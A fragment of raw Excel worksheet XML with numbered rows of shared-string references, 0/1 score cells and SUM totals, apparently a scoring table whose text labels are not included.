      <c r="A10" s="11" t="s">
        <v>80</v>
      </c>
      <c r="B10" s="12" t="s">
        <v>108</v>
      </c>
      <c r="C10" s="12" t="s">
        <v>108</v>
      </c>
      <c r="D10" s="12">
        <v>1</v>
      </c>
      <c r="E10" s="12">
        <v>1</v>
      </c>
      <c r="F10" s="12" t="s">
        <v>108</v>
      </c>
      <c r="G10" s="12">
        <v>1</v>
      </c>
      <c r="H10" s="12">
        <v>1</v>
      </c>
      <c r="I10" s="3"/>
    </row>
    <row r="11" spans="1:9" ht="26.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A11" s="11" t="s">
        <v>81</v>
      </c>
      <c r="B11" s="12" t="s">
        <v>109</v>
      </c>
      <c r="C11" s="12" t="s">
        <v>110</v>
      </c>
      <c r="D11" s="12">
        <v>1</v>
      </c>
      <c r="E11" s="12">
        <v>1</v>
      </c>
      <c r="F11" s="12" t="s">
        <v>110</v>
      </c>
      <c r="G11" s="12">
        <v>1</v>
      </c>
      <c r="H11" s="12">
        <v>0</v>
      </c>
      <c r="I11" s="3"/>
    </row>
    <row r="12" spans="1:9" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A12" s="11" t="s">
        <v>90</v>
      </c>
      <c r="B12" s="12" t="s">
        <v>111</v>
      </c>
      <c r="C12" s="12" t="s">
        <v>37</v>
      </c>
      <c r="D12" s="12">
        <v>1</v>
      </c>
      <c r="E12" s="12">
        <v>0</v>
      </c>
      <c r="F12" s="12" t="s">
        <v>36</v>
      </c>
      <c r="G12" s="12">
        <v>1</v>
      </c>
      <c r="H12" s="12">
        <v>0</v>
      </c>
      <c r="I12" s="3"/>
    </row>
    <row r="13" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A13" s="11" t="s">
        <v>91</v>
      </c>
      <c r="B13" s="12" t="s">
        <v>36</v>
      </c>
      <c r="C13" s="12" t="s">
        <v>37</v>
      </c>
      <c r="D13" s="12">
        <v>1</v>
      </c>
      <c r="E13" s="12">
        <v>0</v>
      </c>
      <c r="F13" s="12" t="s">
        <v>36</v>
      </c>
      <c r="G13" s="12">
        <v>1</v>
      </c>
      <c r="H13" s="12">
        <v>1</v>
      </c>
      <c r="I13" s="3"/>
    </row>
    <row r="14" spans="1:9" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A14" s="11" t="s">
        <v>92</v>
      </c>
      <c r="B14" s="12" t="s">
        <v>112</v>
      </c>
      <c r="C14" s="12" t="s">
        <v>113</v>
      </c>
      <c r="D14" s="12">
        <v>1</v>
      </c>
      <c r="E14" s="12">
        <v>0</v>
      </c>
      <c r="F14" s="12" t="s">
        <v>112</v>
      </c>
      <c r="G14" s="12">
        <v>1</v>
      </c>
      <c r="H14" s="12">
        <v>1</v>
      </c>
      <c r="I14" s="3"/>
    </row>
    <row r="15" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A15" s="11" t="s">
        <v>84</v>
      </c>
      <c r="B15" s="12" t="s">
        <v>114</v>
      </c>
      <c r="C15" s="12" t="s">
        <v>115</v>
      </c>
      <c r="D15" s="12">
        <v>1</v>
      </c>
      <c r="E15" s="12">
        <v>1</v>
      </c>
      <c r="F15" s="12" t="s">
        <v>116</v>
      </c>
      <c r="G15" s="12">
        <v>0</v>
      </c>
      <c r="H15" s="12">
        <v>0</v>
      </c>
      <c r="I15" s="3"/>
    </row>
    <row r="16" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A16" s="11" t="s">
        <v>85</v>
      </c>
      <c r="B16" s="12" t="s">
        <v>117</v>
      </c>
      <c r="C16" s="12" t="s">
        <v>1895</v>
      </c>
      <c r="D16" s="12">
        <v>0</v>
      </c>
      <c r="E16" s="12">
        <v>0</v>
      </c>
      <c r="F16" s="12" t="s">
        <v>117</v>
      </c>
      <c r="G16" s="12">
        <v>1</v>
      </c>
      <c r="H16" s="12">
        <v>1</v>
      </c>
      <c r="I16" s="3"/>
    </row>
    <row r="17" spans="1:9" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A17" s="11" t="s">
        <v>93</v>
      </c>
      <c r="B17" s="12" t="s">
        <v>118</v>
      </c>
      <c r="C17" s="12" t="s">
        <v>37</v>
      </c>
      <c r="D17" s="12">
        <v>1</v>
      </c>
      <c r="E17" s="12">
        <v>0</v>
      </c>
      <c r="F17" s="12" t="s">
        <v>36</v>
      </c>
      <c r="G17" s="12">
        <v>1</v>
      </c>
      <c r="H17" s="12">
        <v>0</v>
      </c>
      <c r="I17" s="3"/>
    </row>
    <row r="18" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A18" s="11" t="s">
        <v>91</v>
      </c>
      <c r="B18" s="12" t="s">
        <v>36</v>
      </c>
      <c r="C18" s="12" t="s">
        <v>37</v>
      </c>
      <c r="D18" s="12">
        <v>1</v>
      </c>
      <c r="E18" s="12">
        <v>0</v>
      </c>
      <c r="F18" s="12" t="s">
        <v>36</v>
      </c>
      <c r="G18" s="12">
        <v>1</v>
      </c>
      <c r="H18" s="12">
        <v>1</v>
      </c>
      <c r="I18" s="3"/>
    </row>
    <row r="19" spans="1:9" ht="52.8" x14ac:dyDescent="0.25">
      <c r="A19" s="11" t="s">
        <v>94</v>
      </c>
      <c r="B19" s="12" t="s">
        <v>121</v>
      </c>
      <c r="C19" s="12" t="s">
        <v>121</v>
      </c>
      <c r="D19" s="12">
        <v>1</v>
      </c>
      <c r="E19" s="12">
        <v>1</v>
      </c>
      <c r="F19" s="12" t="s">
        <v>121</v>
      </c>
      <c r="G19" s="12">
        <v>1</v>
      </c>
      <c r="H19" s="12">
        <v>1</v>
      </c>
      <c r="I19" s="3"/>
    </row>
    <row r="20" spans="1:9" ht="52.8" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A20" s="11" t="s">
        <v>95</v>
      </c>
      <c r="B20" s="12" t="s">
        <v>122</v>
      </c>
      <c r="C20" s="12" t="s">
        <v>1296</v>
      </c>
      <c r="D20" s="12">
        <v>0</v>
      </c>
      <c r="E20" s="12">
        <v>0</v>
      </c>
      <c r="F20" s="12" t="s">
        <v>123</v>
      </c>
      <c r="G20" s="12">
        <v>1</v>
      </c>
      <c r="H20" s="12">
        <v>0</v>
      </c>
      <c r="I20" s="3"/>
    </row>
    <row r="21" spans="1:9" ht="39.6" x14ac:dyDescent="0.25">
      <c r="A21" s="11" t="s">
        <v>96</v>
      </c>
      <c r="G21" s="12"/>
      <c r="H21" s="12"/>
      <c r="I21" s="3"/>
    </row>
    <row r="22" spans="1:9" ht="52.8" x14ac:dyDescent="0.25">
      <c r="A22" s="11" t="s">
        <v>97</v>
      </c>
      <c r="B22" s="12"/>
      <c r="C22" s="12"/>
      <c r="D22" s="12"/>
      <c r="E22" s="12"/>
      <c r="F22" s="12"/>
      <c r="G22" s="12"/>
      <c r="H22" s="12"/>
      <c r="I22" s="3"/>
    </row>
    <row r="23" spans="1:9" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A23" s="11" t="s">
        <v>86</v>
      </c>
      <c r="B23" s="12" t="s">
        <v>124</v>
      </c>
      <c r="C23" s="12" t="s">
        <v>125</v>
      </c>
      <c r="D23" s="12">
        <v>1</v>
      </c>
      <c r="E23" s="12">
        <v>1</v>
      </c>
      <c r="F23" s="12" t="s">
        <v>125</v>
      </c>
      <c r="G23" s="12">
        <v>1</v>
      </c>
      <c r="H23" s="12">
        <v>1</v>
      </c>
      <c r="I23" s="3"/>
    </row>
    <row r="24" spans="1:9" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A24" s="11" t="s">
        <v>98</v>
      </c>
      <c r="B24" s="12"/>
      <c r="C24" s="12"/>
      <c r="D24" s="12"/>
      <c r="E24" s="12"/>
      <c r="F24" s="12"/>
      <c r="G24" s="12"/>
      <c r="H24" s="12"/>
      <c r="I24" s="3"/>
    </row>
    <row r="25" spans="1:9" ht="52.8" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A25" s="11" t="s">
        <v>99</v>
      </c>
      <c r="B25" s="12" t="s">
        <v>126</v>
      </c>
      <c r="C25" s="12" t="s">
        <v>1297</v>
      </c>
      <c r="D25" s="12">
        <v>1</v>
      </c>
      <c r="E25" s="12">
        <v>1</v>
      </c>
      <c r="F25" s="12" t="s">
        <v>126</v>
      </c>
      <c r="G25" s="12">
        <v>1</v>
      </c>
      <c r="H25" s="12">
        <v>1</v>
      </c>
      <c r="I25" s="3"/>
    </row>
    <row r="26" spans="1:9" ht="39.6" x14ac:dyDescent="0.25">
      <c r="A26" s="11" t="s">
        <v>100</v>
      </c>
      <c r="B26" s="12" t="s">
        <v>127</v>
      </c>
      <c r="C26" s="12" t="s">
        <v>127</v>
      </c>
      <c r="D26" s="12">
        <v>1</v>
      </c>
      <c r="E26" s="12">
        <v>1</v>
      </c>
      <c r="F26" s="12" t="s">
        <v>127</v>
      </c>
      <c r="G26" s="12">
        <v>1</v>
      </c>
      <c r="H26" s="12">
        <v>1</v>
      </c>
      <c r="I26" s="3"/>
    </row>
    <row r="27" spans="1:9" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A27" s="11" t="s">
        <v>101</v>
      </c>
      <c r="B27" s="12"/>
      <c r="C27" s="12"/>
      <c r="D27" s="12"/>
      <c r="E27" s="12"/>
      <c r="F27" s="12"/>
      <c r="G27" s="12"/>
      <c r="H27" s="12"/>
      <c r="I27" s="3"/>
    </row>
    <row r="28" spans="1:9" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A28" s="11" t="s">
        <v>102</v>
      </c>
      <c r="B28" s="12"/>
      <c r="C28" s="12"/>
      <c r="D28" s="12"/>
      <c r="E28" s="12"/>
      <c r="F28" s="12"/>
      <c r="G28" s="12"/>
      <c r="H28" s="12"/>
    </row>
    <row r="29" spans="1:9" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A29" s="6" t="s">
        <v>41</v>
      </c>
      <c r="D29" s="6">
        <f>SUM(D4:D28)</f>
        <v>17</v>
      </c>
      <c r="E29" s="6">
        <f t="shared" ref="E29:H29" si="0">SUM(E4:E28)</f>
        <v>12</v>
      </c>
      <c r="F29" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G29" s="6">
        <f t="shared" si="0"/>
        <v>18</v>
      </c>
      <c r="H29" s="6">
        <f t="shared" si="0"/>
        <v>14</v>
      </c>
    </row>
    <row r="32" spans="1:9" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A32" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B32" s="25"/>
      <c r="C32" s="25"/>
      <c r="D32" s="25"/>
      <c r="E32" s="25"/>
      <c r="F32" s="25"/>
      <c r="G32" s="25"/>
      <c r="H32" s="25"/>
    </row>
    <row r="33" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A33" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B33" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C33" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D33" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E33" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F33" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G33" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H33" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="34" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D34">
        <v>1</v>
      </c>
      <c r="E34">
        <v>1</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G34">
        <v>1</v>
      </c>
      <c r="H34">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D35">
        <v>1</v>
      </c>
      <c r="E35">
        <v>1</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G35">
        <v>1</v>
      </c>
      <c r="H35">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A36" s="27" t="s">
        <v>1029</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>1059</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A37" s="27"/>
      <c r="B37" s="3" t="s">
        <v>1060</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>1082</v>
      </c>
      <c r="D37">
        <v>1</v>
      </c>
      <c r="E37">
        <v>1</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>1082</v>
      </c>
      <c r="G37">
        <v>1</v>
      </c>
      <c r="H37">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A38" s="3" t="s">
        <v>1030</v>
      </c>
      <c r="B38" s="3" t="s">
        <v>60</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="D38">
        <v>1</v>
      </c>
      <c r="E38">
        <v>1</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="G38">
        <v>1</v>
      </c>
      <c r="H38">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A39" s="3" t="s">
        <v>1031</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>1032</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>1298</v>
      </c>
      <c r="D39">
        <v>1</v>
      </c>
      <c r="E39">
        <v>1</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>1084</v>
      </c>
      <c r="G39">
        <v>1</v>
      </c>
      <c r="H39">
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A40" s="27" t="s">
        <v>1033</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>1061</v>
      </c>
      <c r="C40" s="9" t="s">
        <v>1299</v>
      </c>
      <c r="D40">
        <v>1</v>
      </c>
      <c r="E40">
        <v>0</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>1093</v>
      </c>
      <c r="G40">
        <v>1</v>
      </c>
      <c r="H40">
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A41" s="27"/>
      <c r="B41" s="3" t="s">
        <v>1063</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>1091</v>
      </c>
      <c r="D41">
        <v>1</v>
      </c>
      <c r="E41">
        <v>0</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>1091</v>
      </c>
      <c r="G41">
        <v>1</v>
      </c>
      <c r="H41">
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>1034</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>1035</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>1076</v>
      </c>
      <c r="D42">
        <v>1</v>
      </c>
      <c r="E42">
        <v>1</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>1076</v>
      </c>
      <c r="G42">
        <v>1</v>
      </c>
      <c r="H42">
        <v>1</v>
      </c>
    </row>
    <row r="43" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A43" s="3" t="s">
        <v>1036</v>
      </c>
      <c r="B43" s="3" t="s">
        <v>1037</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>1300</v>
      </c>
      <c r="D43">
        <v>1</v>
      </c>
      <c r="E43">
        <v>1</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>1085</v>
      </c>
      <c r="G43">
        <v>1</v>
      </c>
      <c r="H43">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A44" s="27" t="s">
        <v>1038</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>1065</v>
      </c>
      <c r="C44" s="9" t="s">
        <v>1083</v>
      </c>
      <c r="D44">
        <v>1</v>
      </c>
      <c r="E44">
        <v>1</v>
      </c>
      <c r="F44" s="3" t="s">
        <v>1083</v>
      </c>
      <c r="G44">
        <v>1</v>
      </c>
      <c r="H44">
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A45" s="27"/>
      <c r="B45" s="3" t="s">
        <v>1064</v>
      </c>
      <c r="C45" s="3" t="s">
        <v>1094</v>
      </c>
      <c r="D45">
        <v>1</v>
      </c>
      <c r="E45">
        <v>0</v>
      </c>
      <c r="F45" s="3" t="s">
        <v>1094</v>
      </c>
      <c r="G45">
        <v>1</v>
      </c>
      <c r="H45">
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A46" s="27" t="s">
        <v>1066</v>
      </c>
      <c r="B46" s="3" t="s">
        <v>1067</v>
      </c>
      <c r="C46" s="3" t="s">
        <v>1301</v>
      </c>
      <c r="D46">
        <v>1</v>
      </c>
      <c r="E46">
        <v>1</v>
      </c>
      <c r="F46" s="3" t="s">
        <v>1095</v>
      </c>
      <c r="G46">
        <v>1</v>
      </c>
      <c r="H46">
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A47" s="27"/>
      <c r="B47" s="3" t="s">
        <v>1069</v>
      </c>
      <c r="C47" s="3" t="s">
        <v>1896</v>
      </c>
      <c r="D47">
        <v>0</v>
      </c>
      <c r="E47">
        <v>0</v>
      </c>
      <c r="F47" s="3" t="s">
        <v>1096</v>
      </c>
      <c r="G47">
        <v>1</v>
      </c>
      <c r="H47">
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A48" s="27"/>
      <c r="B48" s="3" t="s">
        <v>1068</v>
      </c>
      <c r="C48" s="3" t="s">
        <v>1068</v>
      </c>
      <c r="D48">
        <v>1</v>
      </c>
      <c r="E48">
        <v>1</v>
      </c>
      <c r="F48" s="3" t="s">
        <v>1068</v>
      </c>
      <c r="G48">
        <v>1</v>
      </c>
      <c r="H48">
        <v>1</v>
      </c>
    </row>
    <row r="49" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A49" s="3" t="s">
        <v>1039</v>
      </c>
      <c r="B49" s="3" t="s">
        <v>1040</v>
      </c>
      <c r="C49" s="3" t="s">
        <v>1077</v>
      </c>
      <c r="D49">
        <v>1</v>
      </c>
      <c r="E49">
        <v>1</v>
      </c>
      <c r="F49" s="3" t="s">
        <v>1077</v>
      </c>
      <c r="G49">
        <v>1</v>
      </c>
      <c r="H49">
        <v>1</v>
      </c>
    </row>
    <row r="50" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A50" s="3" t="s">
        <v>1041</v>
      </c>
      <c r="B50" s="3" t="s">
        <v>1042</v>
      </c>
      <c r="C50" s="3" t="s">
        <v>1302</v>
      </c>
      <c r="D50">
        <v>1</v>
      </c>
      <c r="E50">
        <v>1</v>
      </c>
      <c r="F50" s="3" t="s">
        <v>1086</v>
      </c>
      <c r="G50">
        <v>1</v>
      </c>
      <c r="H50">
        <v>1</v>
      </c>
    </row>
    <row r="51" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A51" s="27" t="s">
        <v>1043</v>
      </c>
      <c r="B51" s="3" t="s">
        <v>1071</v>
      </c>
      <c r="C51" s="3" t="s">
        <v>1303</v>
      </c>
      <c r="D51">
        <v>1</v>
      </c>
      <c r="E51">
        <v>1</v>
      </c>
      <c r="F51" s="3" t="s">
        <v>1087</v>
      </c>
      <c r="G51">
        <v>1</v>
      </c>
      <c r="H51">
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A52" s="27"/>
      <c r="B52" s="3" t="s">
        <v>1070</v>
      </c>
      <c r="C52" s="3"/>
      <c r="D52">
        <v>0</v>
      </c>
      <c r="E52">
        <v>0</v>
      </c>
      <c r="F52" s="3" t="s">
        <v>1070</v>
      </c>
      <c r="G52">
        <v>1</v>
      </c>
      <c r="H52">
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A53" s="3" t="s">
        <v>1044</v>
      </c>
      <c r="B53" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="C53" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="D53">
        <v>1</v>
      </c>
      <c r="E53">
        <v>1</v>
      </c>
      <c r="F53" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="G53">
        <v>1</v>
      </c>
      <c r="H53">
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A54" s="3" t="s">
        <v>1046</v>
      </c>
      <c r="B54" s="3" t="s">
        <v>1047</v>
      </c>
      <c r="C54" s="3" t="s">
        <v>1304</v>
      </c>
      <c r="D54">
        <v>1</v>
      </c>
      <c r="E54">
        <v>1</v>
      </c>
      <c r="F54" s="3" t="s">
        <v>1088</v>
      </c>
      <c r="G54">
        <v>1</v>
      </c>
      <c r="H54">
        <v>1</v>
      </c>
    </row>
    <row r="55" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A55" s="3" t="s">
        <v>1048</v>
      </c>
      <c r="B55" s="3" t="s">
        <v>1049</v>
      </c>
      <c r="C55" s="3" t="s">
        <v>1078</v>
      </c>
      <c r="D55">
        <v>1</v>
      </c>
      <c r="E55">
        <v>1</v>
      </c>
      <c r="F55" s="3" t="s">
        <v>1089</v>
      </c>
      <c r="G55">
        <v>1</v>
      </c>
      <c r="H55">
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A56" s="3" t="s">
        <v>1050</v>
      </c>
      <c r="B56" s="3" t="s">
        <v>1051</v>
      </c>
      <c r="C56" s="3" t="s">
        <v>1079</v>
      </c>
      <c r="D56">
        <v>1</v>
      </c>
      <c r="E56">
        <v>1</v>
      </c>
      <c r="F56" s="3" t="s">
        <v>1090</v>
      </c>
      <c r="G56">
        <v>1</v>
      </c>
      <c r="H56">
        <v>1</v>
      </c>
    </row>
    <row r="57" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A57" s="3" t="s">
        <v>1041</v>
      </c>
      <c r="B57" s="3" t="s">
        <v>1042</v>
      </c>
      <c r="C57" s="3" t="s">
        <v>1302</v>
      </c>
      <c r="D57">
        <v>1</v>
      </c>
      <c r="E57">
        <v>1</v>
      </c>
      <c r="F57" s="3" t="s">
        <v>1086</v>
      </c>
      <c r="G57">
        <v>1</v>
      </c>
      <c r="H57">
        <v>1</v>
      </c>
    </row>
    <row r="58" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A58" s="27" t="s">
        <v>1052</v>
      </c>
      <c r="B58" s="3" t="s">
        <v>1072</v>
      </c>
      <c r="C58" s="3" t="s">
        <v>1303</v>
      </c>
      <c r="D58">
        <v>1</v>
      </c>
      <c r="E58">
        <v>1</v>
      </c>
      <c r="F58" s="3" t="s">
        <v>1097</v>
      </c>
      <c r="G58">
        <v>1</v>
      </c>
      <c r="H58">
        <v>1</v>
      </c>
    </row>
    <row r="59" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A59" s="27"/>
      <c r="B59" s="3" t="s">
        <v>1073</v>
      </c>
      <c r="C59" s="3" t="s">
        <v>1073</v>
      </c>
      <c r="D59">
        <v>1</v>
      </c>
      <c r="E59">
        <v>1</v>
      </c>
      <c r="F59" s="3" t="s">
        <v>1073</v>
      </c>
      <c r="G59">
        <v>1</v>
      </c>
      <c r="H59">
        <v>1</v>
      </c>
    </row>
    <row r="60" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A60" s="3" t="s">
        <v>1053</v>
      </c>
      <c r="B60" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="C60" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="D60">
        <v>1</v>
      </c>
      <c r="E60">
        <v>1</v>
      </c>
      <c r="F60" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="G60">
        <v>1</v>
      </c>
      <c r="H60">
        <v>1</v>
      </c>
    </row>
    <row r="61" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A61" s="3" t="s">
        <v>1046</v>
      </c>
      <c r="B61" s="3" t="s">
        <v>1047</v>
      </c>
      <c r="C61" s="3" t="s">
        <v>1304</v>
      </c>
      <c r="D61">
        <v>1</v>
      </c>
      <c r="E61">
        <v>1</v>
      </c>
      <c r="F61" s="3" t="s">
        <v>1088</v>
      </c>
      <c r="G61">
        <v>1</v>
      </c>
      <c r="H61">
        <v>1</v>
      </c>
    </row>
    <row r="62" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A62" s="3" t="s">
        <v>1048</v>
      </c>
      <c r="B62" s="3" t="s">
        <v>1049</v>
      </c>
      <c r="C62" s="3" t="s">
        <v>1049</v>
      </c>
      <c r="D62">
        <v>1</v>
      </c>
      <c r="E62">
        <v>1</v>
      </c>
      <c r="F62" s="3" t="s">
        <v>1049</v>
      </c>
      <c r="G62">
        <v>1</v>
      </c>
      <c r="H62">
        <v>1</v>
      </c>
    </row>
    <row r="63" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A63" s="3" t="s">
        <v>1054</v>
      </c>
      <c r="B63" s="3" t="s">
        <v>1055</v>
      </c>
      <c r="C63" s="3" t="s">
        <v>1080</v>
      </c>
      <c r="D63">
        <v>1</v>
      </c>
      <c r="E63">
        <v>1</v>
      </c>
      <c r="F63" s="3" t="s">
        <v>1080</v>
      </c>
      <c r="G63">
        <v>1</v>
      </c>
      <c r="H63">
        <v>1</v>
      </c>
    </row>
    <row r="64" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A64" s="3" t="s">
        <v>1056</v>
      </c>
      <c r="B64" s="3" t="s">
        <v>73</v>
      </c>
      <c r="C64" s="3" t="s">
        <v>73</v>
      </c>
      <c r="D64">
        <v>1</v>
      </c>
      <c r="E64">
        <v>1</v>
      </c>
      <c r="F64" s="3" t="s">
        <v>73</v>
      </c>
      <c r="G64">
        <v>1</v>
      </c>
      <c r="H64">
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="1:8" ht="61.2" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A65" s="3" t="s">
        <v>1057</v>
      </c>
      <c r="B65" s="3" t="s">
        <v>1058</v>
      </c>
      <c r="C65" s="3" t="s">
        <v>1058</v>
      </c>
      <c r="D65">
        <v>1</v>
      </c>
      <c r="E65">
        <v>1</v>
      </c>
      <c r="F65" s="3" t="s">
        <v>1058</v>
      </c>
      <c r="G65">
        <v>1</v>
      </c>
      <c r="H65">
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A66" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D66" s="6">
        <f>SUM(D34:D65)</f>
        <v>30</v>
      </c>
      <c r="E66" s="6">
        <f t="shared" ref="E66:H66" si="1">SUM(E34:E65)</f>
        <v>27</v>
      </c>
      <c r="F66" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G66" s="6">
        <f t="shared" si="1"/>
        <v>32</v>
      </c>
      <c r="H66" s="6">
        <f t="shared" si="1"/>
        <v>27</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="9">
    <mergeCell ref="A44:A45"/>
    <mergeCell ref="A46:A48"/>
    <mergeCell ref="A51:A52"/>
    <mergeCell ref="A58:A59"/>
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A32:H32"/>
    <mergeCell ref="A36:A37"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A40:A41"/>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5E6EF-D5F7-4188-A3EF-A7FCBF07B6C3}">
  <dimension ref="A1:H111"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A67" workbookViewId="0">
      <selection activeCell="C73" sqref="C73:C74"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="3" width="26.6640625" customWidth="1"/>
    <col min="4" max="4" width="9.6640625" customWidth="1"/>
    <col min="5" max="5" width="9.88671875" customWidth="1"/>
    <col min="6" max="6" width="26.6640625" customWidth="1"/>
    <col min="7" max="7" width="10.44140625" customWidth="1"/>
    <col min="8" max="8" width="9.6640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="26.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>932</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x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>385</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>103</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>103</v>
      </c>
      <c r="D4">
        <v>1</v>
      </c>
      <c r="E4">
        <v>1</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>103</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>933</v>
      </c>
